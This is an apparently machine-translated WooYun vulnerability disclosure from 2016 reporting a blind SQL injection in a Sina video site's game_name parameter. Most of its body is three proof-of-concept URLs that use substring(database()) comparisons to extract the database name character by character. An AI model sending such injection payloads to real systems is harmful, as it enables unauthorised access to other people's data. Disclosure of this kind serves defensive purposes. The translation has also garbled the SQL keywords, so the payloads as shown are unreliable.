漏洞标题 新浪站SQL注入 相关制造商 新浪 漏洞作者 过路人 提交时间 2016-06-27 15: 15 公共时间 2016-06-28 11: 35 漏洞类型 SQL注入漏洞 危险等级 在 自我评估等级 6 漏洞状态 该漏洞已通知供应商，但供应商忽略了该漏洞 标签标签 SQL 漏洞详细信息 WooYun:马铃薯网站SQL注入 这..我看到徽标就是你的照片..顺便说一句，我试过了。 http://kan.sina.com.cn/game/game_video?game_name=%E8%8B%B1%E9%9B%84%E8%81%94%E7%9B%9F%27和substring（database（），1， 1）='g'和'x'='x 数据库中的第一个位置是g http://kan.sina.com.cn/game/game_video?game_name=%E8%8B%B1%E9%9B%84%E8%81%94%E7%9B%9F%27和substring（database（），2， 1）='t'和'x'='x 第二个是t http://kan.sina.com.cn/game/game_video?game_name=%E8%8B%B1%E9%9B%84%E8%81%94%E7%9B%9F%27和substring（database（），3， 1）='v'和'x'='x 第三位是v 漏洞证明： 也许马铃薯叫你的api，也许它是通用的？ 修理计划： 过滤+ waf 版权声明：请注明出处。居民A @乌云